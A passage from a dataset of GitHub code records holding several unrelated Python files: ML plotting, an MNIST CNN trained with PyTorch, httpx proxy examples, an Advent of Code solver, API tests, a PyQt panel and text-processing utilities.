model=['logistic regression', 'SVM']);\r\n\r\n#%%\r\n#====================\r\n# SVM FOR REGRESSION\r\n#====================\r\n\r\neps = 0.25\r\nx = np.linspace(-1, 1, 100)\r\nwell_loss = list(map(lambda x: abs(x)-eps if abs(x) > eps else 0, x))\r\nsquare_loss = x**2\r\n\r\nplt.plot(x, well_loss)\r\nplt.plot(x, square_loss)\r\nplt.xlabel('distance from the center')\r\nplt.ylabel('loss')\r\nplt.legend(['well loss', 'square loss']);\r\n\r\n#%%\r\n\r\ndef plot_svr_interact(X, y):\r\n    def plotter(epsilon=0.5, log_C=2):\r\n        rgr = svm.SVR(kernel='linear', epsilon=epsilon, C=10**log_C)\r\n        rgr.fit(X, y)\r\n        \r\n        y_pred = rgr.predict(X)\r\n        ind = np.abs(y - y_pred) >= epsilon\r\n\r\n        plt.scatter(X[ind], y[ind], s=100, color='y')\r\n        plt.scatter(X, y)\r\n        plt.fill_between(X.reshape(-1,), y_pred - epsilon, y_pred + epsilon, alpha=0.25, color='k', linewidth=0)\r\n        plt.plot(X, y_pred, '-k')\r\n        plt.xlabel('$x$')\r\n        plt.ylabel('$y$')\r\n\r\n    return plotter\r\n\r\n#%%\r\n\r\nnp.random.seed(0)\r\nx = np.linspace(-1, 1, 100)\r\ny = 2*x + 1 + 0.5*np.random.randn(100)\r\n\r\nlog_C_slider = FloatSlider(min=-3, max=1, step=0.05, value=-1, description='$\\log(C)$')\r\nepsilon_slider = FloatSlider(min=0.05, max=2, step=0.05, value=0.5, description='$\\epsilon$')\r\ninteract(plot_svr_interact(x.reshape(-1, 1), y), log_C=log_C_slider, epsilon=epsilon_slider);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"FankaRoy/Machine-Learning","sub_path":"ML_Support_Vector_Machines_.py","file_name":"ML_Support_Vector_Machines_.py","file_ext":"py","file_size_in_byte":8370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32625983194","text":"import argparse\n\ndef display_args(args):\n    print(args)\n    print(f'arg1 : {args.arg1}')\n    print(f'arg2 : {args.arg2}')\n    \n    return 0\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(#\"-short-ver\", \n                    \"--arg1\", \n                    help=\"arg1_description\", \n                    #type=bool, \n                    default=False)\n\nparser.add_argument(#\"-short-ver\", \n                    \"--arg2\", \n                    help=\"arg2_description\", \n                    #type=bool, \n                    default=False)\n\nargs = parser.parse_args()\n\nprint(args.arg1)\n\nprint(args.arg2)\n\nprint(args)\n\nprint(\"==== Function 
====\")\n\ndisplay_args(args)\n\n","repo_name":"betashort/ClassActivationMappings","sub_path":"args_test.py","file_name":"args_test.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1481945806","text":"# -*- encoding: utf-8 -*-\n'''\n@Time : 2021-03-01\n@Author : EvilRecluse\n@Contact : https://github.com/RecluseXU\n@Desc : 使用代理\n'''\n\n# here put the import lib\nimport httpx\n\n\ndef proxy_base():\n \"\"\" 代理的基础使用方法\n \"\"\"\n proxies = {\n \"http://\": \"http://localhost:8030\",\n \"https://\": \"http://localhost:8031\",\n }\n\n with httpx.Client(proxies=proxies) as client:\n resp = client.get(\"http://httpbin.org/ip\")\n print(resp.json())\n\n\ndef proxy_route():\n \"\"\" 代理路由, 根据访问的url选择不同的代理进行使用\n \"\"\"\n proxies = {\n # 让所有请求都走这个代理\n \"all://example.com\": \"http://localhost:8030\",\n # 根据请求协议类型走不同的代理\n \"http://\": \"http://localhost:8030\",\n \"https://\": \"http://localhost:8031\",\n # 指定url走不同的代理\n \"all://example.com\": \"http://localhost:8030\",\n # 指定域名走不同的代理\n \"all://*example.com\": \"http://localhost:8030\",\n # 指定子域名走不同代理\n \"all://*.example.com\": \"http://localhost:8030\",\n # 指定端口走不同代理\n \"https://example.com:1234\": \"http://localhost:8030\",\n # 不走代理\n \"http://example.com/a\": None,\n }\n with httpx.Client(proxies=proxies) as client:\n resp = client.get(\"http://httpbin.org/ip\")\n print(resp.json())\n\n\ndef proxy_type():\n \"\"\" 检查代理类型\n \"\"\"\n proxies = httpx.Proxy(\n url=\"https://localhost:8030\",\n mode=\"TUNNEL_ONLY\", # 这个代理必须是隧道类型\n )\n\n with httpx.Client(proxies=proxies) as client:\n # This HTTP request will be tunneled instead of forwarded\n resp = client.get(\"http://example.com\")\n print(resp.url)\n\n\nproxy_base()\nproxy_route()\n","repo_name":"RecluseXU/learning_spider","sub_path":"example/0_Basic_usage_of_the_library/python_httpx/3_5_proxy.py","file_name":"3_5_proxy.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"32"} +{"seq_id":"23690002173","text":"from collections import defaultdict\nfrom itertools import islice, count\nfrom math import sqrt\nfrom queue import Queue\n\nfrom shared.Util import timed\n\n\n@timed\ndef read():\n file_name = f'input{input(\"Input file #: \")}.txt'\n with open(file_name) as input_file:\n return [(op, list(map(lambda y: int(y) if y[-1].isdigit() else y, args))) for op, *args in map(lambda line: line.rstrip().split(), input_file.readlines())]\n\n\ndef run_instruction(instructions, pointer, registers, send_queue: Queue, receive_queue: Queue):\n op, args = instructions[pointer]\n if op == 'snd':\n a, = args\n send_queue.put(registers[a])\n pointer += 1\n elif op == 'set':\n a, b = args\n registers[a] = b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'add':\n a, b = args\n registers[a] += b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'sub':\n a, b = args\n registers[a] -= b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'mul':\n a, b = args\n registers[a] *= b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'mod':\n a, b = args\n registers[a] %= b if isinstance(b, int) else registers[b]\n pointer += 1\n elif op == 'rcv':\n a, = args\n if not receive_queue.empty():\n registers[a] = receive_queue.get()\n pointer += 1\n elif op == 'jgz':\n a, b = args\n c = a if isinstance(a, int) else registers[a]\n pointer += (b if isinstance(b, int) else 
registers[b]) if c > 0 else 1\n elif op == 'jnz':\n a, b = args\n c = a if isinstance(a, int) else registers[a]\n pointer += (b if isinstance(b, int) else registers[b]) if c != 0 else 1\n\n return pointer\n\n\n@timed\ndef part1(instructions):\n registers = defaultdict(int)\n pointer = 0\n counter = 0\n while 0 <= pointer < len(instructions):\n op, _ = instructions[pointer]\n if op == 'mul':\n counter += 1\n pointer = run_instruction(instructions, pointer, registers, None, None)\n\n print(counter)\n\n\ndef is_prime(n):\n return all(n % i for i in islice(count(2), int(sqrt(n) - 1)))\n\n\n@timed\ndef part2(instructions):\n print(len(list(filter(lambda num: not is_prime(num), range(106700, 123701, 17)))))\n print(sum(1 for num in range(106700, 123701, 17) if not is_prime(num)))\n\n\nif __name__ == '__main__':\n instruction_list = read()\n part1(instruction_list)\n part2(instruction_list)\n","repo_name":"TumuGuskun/aoc","sub_path":"aoc-2017/day23/Day23.py","file_name":"Day23.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10195878004","text":"import pytest\nfrom rocketry.conds import scheduler_cycles\nfrom rocketry import Rocketry\n\nfrom subsystems.apps import AutoAPI\nfrom fastapi.testclient import TestClient\n\ndef do_success():\n ...\n\n@pytest.fixture()\ndef scheduler():\n app = Rocketry()\n app.params(myparam=\"hello\")\n app.task(start_cond=\"every 10 seconds\", func=do_success, name=\"do_short\")\n app.task(start_cond=\"every 10 seconds\", func=do_success, name=\"do_stuff\")\n app.task(start_cond=\"every 10 seconds\", func=do_success, name=\"do_things\")\n return app\n\n@pytest.fixture()\ndef api(scheduler):\n app = AutoAPI(scheduler=scheduler)\n return app\n\n@pytest.fixture()\ndef client(api):\n return TestClient(api)\n\ndef test_get_tasks(client):\n response = client.get(\"/tasks\")\n assert response.status_code == 200\n\n body = response.json()\n assert isinstance(body, list)\n assert len(body) > 0\n\ndef test_get_config(client):\n response = client.get(\"/session/config\")\n assert response.status_code == 200\n\n body = response.json()\n assert isinstance(body, dict)\n assert set(body.keys()) >= {\"task_priority\", \"task_priority\", \"multilaunch\", \"timeout\", \"shut_cond\", \"cycle_sleep\"}\n\ndef test_get_params(client):\n response = client.get(\"/session/parameters\")\n assert response.status_code == 200\n\n body = response.json()\n assert body == {\"myparam\": \"hello\"}\n\ndef test_post_task_run(client):\n resp = client.get(\"/tasks/do_short\")\n assert resp.status_code == 200\n assert not resp.json()[\"set_running\"]\n\n response = client.post(\"/tasks/do_short/run\")\n assert response.status_code == 200\n\n assert client.get(\"/tasks/do_short\").json()[\"set_running\"]\n\ndef test_post_task_disable_enable(client):\n assert not client.get(\"/tasks/do_short\").json()[\"disabled\"]\n\n for _ in range(2):\n response = client.post(\"/tasks/do_short/disable\")\n assert response.status_code == 200\n assert client.get(\"/tasks/do_short\").json()[\"disabled\"]\n\n for _ in range(2):\n response = client.post(\"/tasks/do_short/enable\")\n assert response.status_code == 200\n assert not client.get(\"/tasks/do_short\").json()[\"disabled\"]\n\ndef test_get_logs(scheduler, client):\n scheduler.session.config.shut_cond = scheduler_cycles(1)\n scheduler.session.config.instant_shutdown = True\n scheduler.run()\n response = client.get(\"/logs\")\n assert response.status_code == 
200\n\n    body = response.json()\n    assert isinstance(body, list)\n    assert len(body) > 3","repo_name":"Miksus/subsystems","sub_path":"subsystems/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10715384355","text":"# import turtle\n#\n# #create an object of class Turtle\n# my_turtle = turtle.Turtle()\n# print(my_turtle)\n# my_turtle.shape(\"turtle\")\n# my_turtle.color(\"green\")\n# my_turtle.home()\n# my_turtle.forward(30)\n# #create object for screen\n# my_screen = turtle.Screen()\n# print(my_screen.canvheight)\n# my_screen.bgcolor(\"pink\")\n# my_screen.exitonclick()\n# print(my_turtle.color)\n\n\n#get the color of the turtle changed\nimport prettytable\n#from prettytable import PrettyTable\nmy_table = prettytable.PrettyTable()\n\nmy_table.add_column(\"Pokemon\",[\"Pikachu\",\"Squirtle\",\"Charmander\"])\nmy_table.add_column(\"Type\",[\"Electric\",\"Water\",\"Fire\"])\nmy_table.align = \"l\"\nprint(my_table)","repo_name":"sakumv/PyCharmProjects","sub_path":"turtleProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12473422996","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\nfrom ui.config import uiConfig\nfrom ui.CustomSelectRegionTableWidget import CustomSelectRegionTableWidget\n\nclass ToolsContainer(QFrame):\n\n    showInfoSig = pyqtSignal()\n\n    updateImageShownLayoutSignal = pyqtSignal(tuple)\n\n    def __init__(self, ParentWidget):\n        QFrame.__init__(self, ParentWidget)\n\n        self.setGeometry(uiConfig.calcToolsContainerGeometry())\n        print(\"ToolsContainer Geometry:\")\n        print(self.geometry())\n        self.setFrameShape(QFrame.StyledPanel)\n        self.setFrameShadow(QFrame.Plain)\n        self.setObjectName(\"toolsContainer\")\n\n        #Feature 1\n        #a selectable table used to adjust the layout of the image rendering area\n        self.selectImageShownRegionTableWidget = CustomSelectRegionTableWidget()\n        self.selectImageShownRegionTableWidget.setParent(self)\n\n        #button used to test each feature\n        self.testButton = QPushButton(self)\n        self.testButton.setGeometry(0, self.selectImageShownRegionTableWidget.height(), 100, 30)\n        self.testButton.clicked.connect(self.updateImageShownLayoutSignalHandler)\n\n        #button used to show information\n        self.pushButton = QPushButton(self)\n        self.pushButton.setGeometry(0, self.selectImageShownRegionTableWidget.height() + self.testButton.height(), 100, 30)\n        self.pushButton.clicked.connect(self.showInfoSig)\n        #\n        # self.verticalLayoutWidget = QtWidgets.QWidget(self)\n        # self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 200, 1600))\n        # self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n        # self.toolsVerticalContainer = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n        # self.toolsVerticalContainer.setContentsMargins(0, 0, 0, 0)\n        # self.toolsVerticalContainer.setObjectName(\"toolsVerticalContainer\")\n        #\n        # self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n        # self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n        # spacerItem = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout_2.addItem(spacerItem)\n        #\n        # spacerItem1 = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout_2.addItem(spacerItem1)\n        # self.pushButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n        # self.pushButton.setObjectName(\"pushButton\")\n        # self.horizontalLayout_2.addWidget(self.pushButton)\n        # spacerItem2 = QtWidgets.QSpacerItem(40, 20)\n        # 
self.horizontalLayout_2.addItem(spacerItem2)\n        # self.toolsVerticalContainer.addLayout(self.horizontalLayout_2)\n        #\n        # self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n        # self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n        # spacerItem3 = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout_3.addItem(spacerItem3)\n        #\n        # spacerItem4 = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout_3.addItem(spacerItem4)\n        # self.pushButton_2 = QtWidgets.QPushButton(self.verticalLayoutWidget)\n        # self.pushButton_2.setObjectName(\"pushButton_2\")\n        # self.horizontalLayout_3.addWidget(self.pushButton_2)\n        # spacerItem5 = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout_3.addItem(spacerItem5)\n        # self.toolsVerticalContainer.addLayout(self.horizontalLayout_3)\n        #\n        # self.horizontalLayout = QtWidgets.QHBoxLayout()\n        # self.horizontalLayout.setObjectName(\"horizontalLayout\")\n        # spacerItem6 = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout.addItem(spacerItem6)\n        #\n        # spacerItem7 = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout.addItem(spacerItem7)\n        # self.pushButton_3 = QtWidgets.QPushButton(self.verticalLayoutWidget)\n        # self.pushButton_3.setObjectName(\"pushButton_3\")\n        # self.horizontalLayout.addWidget(self.pushButton_3)\n        # spacerItem8 = QtWidgets.QSpacerItem(40, 20)\n        # self.horizontalLayout.addItem(spacerItem8)\n        # self.toolsVerticalContainer.addLayout(self.horizontalLayout)\n        #\n        # # self.pushButton.clicked.connect(self.showInfoSig)\n        #\n\n    def updateImageShownLayoutSignalHandler(self):\n        if len(self.selectImageShownRegionTableWidget.selectedRanges()) < 1:\n            return\n        selectedRegion = self.selectImageShownRegionTableWidget.selectedRanges()[0]\n        layout = (\n            selectedRegion.topRow(),\n            selectedRegion.leftColumn(),\n            selectedRegion.bottomRow(),\n            selectedRegion.rightColumn()\n        )\n        print(\"Confirm layout\", layout)\n        self.updateImageShownLayoutSignal.emit(layout)\n\n\n    def retranslateUi(self):\n        _translate = QCoreApplication.translate\n        self.pushButton.setText(_translate(\"MainWindow\", \"Show info\"))\n        # self.pushButton_2.setText(_translate(\"MainWindow\", \"Feature 2\"))\n        # self.pushButton_3.setText(_translate(\"MainWindow\", \"Feature 3\"))\n        self.testButton.setText(_translate(\"MainWindow\", \"Confirm layout\"))","repo_name":"evermg42/MRViewer","sub_path":"ui/ToolsContainer.py","file_name":"ToolsContainer.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18260167315","text":"#!/usr/bin/env python\n\n# This creates a Convolutional Neural Network using PyTorch to detect\n# the hand-written characters from the MNIST dataset.\n#\n# The work is based on work by Arijit Mukherjee: https://www.youtube.com/watch?v=kI3F8lLNneM\n# The original code does not mention a license. Since it is publicly available I assume it is\n# fair to use like this. 
If not, let me know.\n# The framework code is mostly unmodified, the network itself is changed to be 8-bit friendly\n\nimport torch, torchvision\nfrom torch import nn,optim\nfrom torch.autograd import Variable as var\n\n\nn_batch= 128\nlearning_rate = 0.0005\nn_epoch = 20\nn_print = 50\nresize_to = 14\ndevice = \"cuda:0\"\n\n# A custom transform to binarize the input data.\n# The demo device touch screen is not really sensitive enough\n# to give more than binary touch data, so this makes the MNIST data\n# look more like what the code on the AVR sees\nclass Binarize(object):\n def __call__(self, img):\n img[img < 0.3]=0\n img[img >= 0.3]=1\n return img\n# Stack up all transforms performed on each input image. These augment the dataset nicely.\n# Output is a 14x14x1 pixel image.\nT = torchvision.transforms.Compose([torchvision.transforms.ToTensor(),\n torchvision.transforms.RandomRotation(15),\n torchvision.transforms.Resize(resize_to+2),\n torchvision.transforms.RandomCrop(resize_to),\n Binarize()\n ])\n\ntrain_data = torchvision.datasets.MNIST('data',train=True,download=True,transform=T)\nval_data = torchvision.datasets.MNIST('data',train=False,download=True,transform=T)\n\ntrain_dl = torch.utils.data.DataLoader(train_data,batch_size = n_batch)\nval_dl = torch.utils.data.DataLoader(val_data,batch_size = n_batch)\n\n\n## If you want to have a look at the input\n#import matplotlib.pyplot as plt\n#dataiter = iter(train_dl)\n#images, labels = dataiter.next()\n#print(images.shape)\n#print(labels.shape)\n#plt.imshow(images[12].numpy().squeeze(), cmap='Greys_r')\n\n\n#### Part II : Writing the Network\nclass myCNN(nn.Module):\n def __init__(self):\n super(myCNN,self).__init__()\n # input: 1 x 14 x 14\n # Conv2d( input_channels, output_channels, kernel_size)\n self.cnn1 = nn.Conv2d(1,20, 5, stride=2, bias=False)\n # 20 x 5 x 5\n self.cnn2 = nn.Conv2d(20,12,3, stride=1, bias=False)\n # 12 x 3 x 3\n\n self.linear = nn.Linear(12*3*3,10)\n self.relu = nn.ReLU()\n\n def forward(self,x):\n n = x.size(0)\n x = self.relu(self.cnn1(x))\n x = self.cnn2(x)\n x = x.view(n,-1)\n x = self.linear(x)\n return x\n\n\n#### Part III : Writing the main Training loop\n\nmycnn = myCNN().cuda()\ncec = nn.CrossEntropyLoss()\noptimizer = optim.Adam(mycnn.parameters(),lr = learning_rate)\n\ndef validate(model,data):\n # To get validation accuracy = (correct/total)*100.\n total = 0\n correct = 0\n for i,(images,labels) in enumerate(data):\n images = var(images.cuda())\n x = model(images)\n value,pred = torch.max(x,1)\n pred = pred.data.cpu()\n total += x.size(0)\n correct += torch.sum(pred == labels)\n return correct*100./total\n\nfor e in range(n_epoch):\n for i,(images,labels) in enumerate(train_dl):\n images = var(images.cuda())\n labels = var(labels.cuda())\n optimizer.zero_grad()\n pred = mycnn(images)\n loss = cec(pred,labels)\n loss.backward()\n optimizer.step()\n if (i+1) % n_print == 0:\n accuracy = float(validate(mycnn,val_dl))\n print('Epoch :',e+1,'Batch :',i+1,'Loss :',float(loss.data),'Accuracy :',accuracy,'%')\n\n\n# Save the trained model as ONNX\ninput_names = [ \"network_input\" ]\noutput_names = [ \"network_output\" ]\ndummy_input = torch.randn(1, 1, resize_to, resize_to).cuda()\ntorch.onnx.export(mycnn, dummy_input, \"mnist.onnx\", input_names=input_names, 
output_names=output_names)\n\n","repo_name":"kraiskil/onnx2c","sub_path":"examples/atmega_mnist/create_network.py","file_name":"create_network.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"32"} +{"seq_id":"6370835295","text":"hexa = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n\n\ndef decimal_para_base(valor: str, base: int):\n    # converting the integer part (successive divisions)\n    valor_inteiro = int(valor.split(\".\")[0])\n\n    restos = []\n\n    if valor_inteiro == 0:\n        restos.append(0)\n\n    while valor_inteiro > 0:\n        restos.append(valor_inteiro % base)\n        valor_inteiro = int(valor_inteiro / base)\n\n    restos.reverse()\n\n    restos_string_int = str()\n    for i in restos:\n        restos_string_int += hexa[i]\n\n    # converting the fractional part (successive multiplications)\n    valor_fracionario = float(valor) - int(valor.split(\".\")[0])\n\n    continuar = True\n    i = 0\n    lista_convertido = []\n    lista_restos = []\n    lista_restos.append(valor_fracionario)\n\n    while continuar:\n        res = lista_restos[i] * base\n        lista_restos.append(float(\"0.\" + str(res).split(\".\")[1]))\n        lista_convertido.append(int(res))\n\n        # check whether the current value is already in the remainder list; if so, it is a repeating fraction\n        for j in range(len(lista_restos) - 1):\n            if lista_restos[j - 1] == lista_restos[i]:\n                continuar = False\n\n        # limit the precision of the result\n        if len(lista_restos) > 4:\n            continuar = False\n\n        i += 1\n\n    restos_string_float = str()\n    for i in lista_convertido:\n        restos_string_float += hexa[i]\n\n    resultado = f\"{restos_string_int}.{restos_string_float}\"\n\n    return resultado\n","repo_name":"mateusfl/calculadora-bases","sub_path":"decimal_para_base.py","file_name":"decimal_para_base.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2961730950","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom objective_functions import gaussian_2d_old, gauss_2d\n\n\ndef plot_simple_data(agent, Xtest, ytest, title='Approximated Function', savefig=False):\n    plt.figure(figsize=(13, 8))\n    yhat = agent.feedforward(Xtest)\n    # plt.plot(xtrain, ytrain, 'kx', label = 'Training Data')\n    plt.plot(Xtest, ytest, 'bx', label='Test Data')\n    plt.plot(Xtest, yhat, '-r', label='Learned Function')\n    # plt.title(r'Fit of $y = x^2$', fontsize = 15)\n    #plt.title(title, fontsize=26)\n    plt.xlabel('x', fontsize=24)\n    plt.ylabel('y', fontsize=24)\n    plt.legend(fontsize=14)\n    if savefig:\n        plt.savefig(title, bbox_inches='tight', transparent=True)\n    else:\n        plt.show()\n\n\ndef prep_for_2d_mesh(agent, Xtest):\n    x1, x2 = Xtest[:, 0], Xtest[:, 1]\n    x1mesh, x2mesh = np.meshgrid(x1, x2)\n    yhats = []\n    xtest3d = []\n\n    for x1_, x2_ in zip(x1mesh, x2mesh):\n        xtest3d.append(np.column_stack([x1_, x2_]))\n\n    for x in xtest3d:\n        yhat = agent.feedforward(x)\n        yhats.append(yhat.flatten())\n\n    yhats = np.array(yhats)\n    return yhats\n\n\ndef plot_ackley(func, agent, bounds=None, title='', savefig=False):\n    if bounds is not None:\n        lb, ub = bounds\n    else:\n        ub = abs(1.5 * agent[0])\n        lb = -ub\n\n    px, py = agent\n\n    x_span = np.linspace(lb, ub, 50)\n    y_span = np.linspace(lb, ub, 50)\n    x, y = np.meshgrid(x_span, y_span)\n    z = func([x, y])  # formula for parabola in 3D\n    pz = func([px, py])\n\n    plt.figure(figsize=(16, 10))\n    ax = plt.axes(projection='3d')\n    ax.scatter(px, py, pz, s=100, color='red');\n    
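# usage sketch (hypothetical objective; any f([x, y]) -> z works here):\n    #   plot_ackley(lambda p: p[0]**2 + p[1]**2, agent=(0.5, -0.3))\n    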
ax.plot_surface(x, y, z, cmap='viridis', alpha=0.75)\n # ax.plot_wireframe(x, y, z, cmap='viridis',zorder=1)\n ax.set_title(title, fontsize=26);\n ax.set_xlabel('x', fontsize=20)\n ax.set_ylabel('y', fontsize=20)\n ax.set_zlabel('z', fontsize=20)\n if savefig:\n plt.savefig(title, bbox_inches='tight', transparent=True)\n else:\n plt.show()\n\n\ndef plot_2d_gauss(agent, X=None, ytest=None, bounds=[-1, 1], mu=[0, 0], sigma=[0.25, 0.25], verbose=False, title=' ',\n savefig=False):\n\n y = prep_for_2d_mesh(agent, X)\n\n if X is None:\n x1 = np.linspace(bounds[0], bounds[1], 50)\n x2 = np.linspace(bounds[0], bounds[1], 50)\n x1, x2 = np.meshgrid(x1, x2)\n y = gaussian_2d_old([x1, x2], mu, sigma)\n elif X is not None:\n x1, x2 = X[:, 0], X[:, 1]\n x1, x2 = np.meshgrid(x1, x2)\n if y is None:\n y = gaussian_2d_old([x1, x2], mu, sigma)\n\n plt.figure(figsize=(16, 10))\n ax = plt.axes(projection='3d')\n ax.plot_surface(x1, x2, y, cmap='viridis', alpha=1)\n #ax.set_title(title, fontsize=26);\n ax.set_xlabel('x1', fontsize=20)\n ax.set_ylabel('x2', fontsize=20)\n ax.set_zlabel('y', fontsize=20)\n if savefig:\n plt.savefig(title, bbox_inches='tight', transparent=True)\n else:\n plt.show()","repo_name":"FaxMan1/Master-Thesis","sub_path":"visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20082510503","text":"import re\n\n# Map from a tag or attribute specification to a compiled regular expression\n# object. Used by the scopenavigator/2 method below for caching purposes.\n# In a multithreaded setting, we currently assume that locking takes place\n# externally. This may an assumption we have to revisit at a later stage.\n_regexpmap = {}\n\n# Precompile some regular expressions used for locating matches. Used by the\n# scopenavigator/2 method below.\n_tagregexp1 = re.compile(\"<\\s*([^!/\\s>]+)([^>]*)\\s*>\")\n_tagregexp2 = re.compile(\"\\s*([^\\s\\\"]+)\\s*=\\s*\\\"[^\\\"]*\\\"\")\n_tagregexp3 = re.compile(\"<\\s*([^!/\\s>]+)(?:\\s+\\w+\\s*=\\s*\\\"[^\\\"]*\\\")*\\s*/?\\s*>\")\n\n# Define the magic begin-of-highlighting and end-of-highlighting sequences. Note that\n# this must be synchronized with whatever term highlighting markup is specified in the\n# fsearch.addon configuration file.\n_junbohseq = chr(2)\n_juneohseq = chr(3)\n\n# Precompile some regular expressions used for locating matches. Used by the\n# internal _enclosingtags/2 method below.\n_junregexp1 = re.compile(_juneohseq)\n_junregexp2 = re.compile(\"<\\s*(/?[^!>\\s]+)(?:\\s+[^=]+\\s*=\\s*\\\"[^\\\"]*\\\")*\\s*>\")\n\n# Define the tags that should be ignored when reporting back matching scopes.\n# Used by the scopenavigator/2 method below. For those tags that are part of\n# the standard XML \"envelope\", this must be synchronized with those specified\n# in the fsearch.addon configuration file. For those tags that are actual\n# content tags but which are not of interest to report back, this must be\n# synchronized with the document processing pipeline configuration.\n_ignoretags = {\"matches\": 1,\n \"xpath\": 1,\n \"filter\": 1,\n \"error\": 1,\n \"match\": 1,\n \"sentence\": 2,\n \"paragraph\": 2,\n \"document\": 2,\n \"title\": 2,\n \"body\": 2}\n\n# Define a regular expression that can be used to strip away tags to yield\n# the original surface forms. 
Used by the scopenavigator/2 method below.\n_stripregexp = re.compile(\"|\".join([r\"(?:<[^!][^>]+>)\", r\"(?:)\", _junbohseq, _juneohseq]))\n\n# Map from a 3 character month name prefix to its number. Used by the isodate/2 method below.\n_monthmap_3c = {\"jan\": \"01\",\n \"ene\": \"01\",\n \"gen\": \"01\",\n \"feb\": \"02\",\n \"fev\": \"02\",\n \"mar\": \"03\",\n \"maa\": \"03\",\n \"apr\": \"04\",\n \"avr\": \"04\",\n \"abr\": \"04\",\n \"may\": \"05\",\n \"mai\": \"05\",\n \"mag\": \"05\",\n \"mei\": \"05\",\n \"jun\": \"06\",\n \"giu\": \"06\",\n \"jul\": \"07\",\n \"lug\": \"07\",\n \"aug\": \"08\",\n \"aou\": \"08\",\n \"ago\": \"08\",\n \"sep\": \"09\",\n \"set\": \"09\",\n \"oct\": \"10\",\n \"okt\": \"10\",\n \"out\": \"10\",\n \"ott\": \"10\",\n \"nov\": \"11\",\n \"dec\": \"12\",\n \"des\": \"12\",\n \"dez\": \"12\",\n \"dic\": \"12\"}\n\n# Map from a 4 character month name prefix to its number. Used by the isodate/2 method below.\n_monthmap_4c = {u\"f\\u00e9v\": \"02\",\n u\"m\\u00e4r\": \"03\",\n u\"juin\": \"06\",\n u\"juil\": \"07\",\n u\"ao\\u00fb\": \"08\",\n u\"d\\u00e9c\": \"12\"}\n\n# Precompile some regular expressions used for matching and substitution. Used by the\n# nlq_quoted/2 and nlq_stopwords/2 methods below.\n_nlq1regexp = re.compile(r\"^\\s*[\\\"\\'].*[\\\"\\']\\s*$\")\n_nlq2regexp = re.compile(r\"\\\"\")\n_nlq3regexp = re.compile(r\"^nlquery\")\n_nlq4regexp = re.compile(r\"[,\\?\\.:\\(\\)\\s]+\")\n\n# Define a list of words that are presumably of no interest to include. Used by the\n# nlq_stopwords/2 method below.\n_nlqstopwords = {\"about\": 1, \"all\": 1, \"also\": 1, \"am\": 1, \"and\": 1, \"any\": 1, \"an\": 1, \"are\":1, \"as\": 1, \"at\": 1,\n \"been\": 1, \"be\": 1, \"but\": 1, \"by\": 1,\n \"cannot\": 1, \"can\": 1, \"couldn\": 1, \"could\": 1,\n \"didn\": 1, \"did\":1, \"doesn\": 1, \"does\": 1, \"done\": 1, \"do\": 1,\n \"for\": 1,\n \"had\": 1, \"hasn\": 1, \"has\": 1, \"haven\": 1, \"have\": 1, \"having\": 1, \"here\": 1, \"how\": 1,\n \"if\": 1, \"into\": 1, \"in\": 1, \"isn\": 1, \"is\": 1,\n \"let\": 1, \"ll\": 1,\n \"might\": 1,\n \"off\": 1, \"of\": 1, \"onto\": 1, \"on\": 1, \"or\": 1, \"out\": 1, \"over\": 1,\n \"shall\": 1, \"shouldn\": 1, \"should\": 1, \"some\": 1, \"so\": 1,\n \"them\": 1, \"then\": 1, \"there\": 1, \"these\": 1, \"they\": 1, \"the\": 1, \"this\": 1, \"those\": 1, \"too\": 1, \"to\": 1,\n \"until\": 1, \"unto\": 1, \"upon\": 1, \"up\": 1, \"us\": 1, \"u\": 1,\n \"very\": 1,\n \"wasn\": 1, \"was\": 1, \"went\": 1, \"weren\": 1, \"were\": 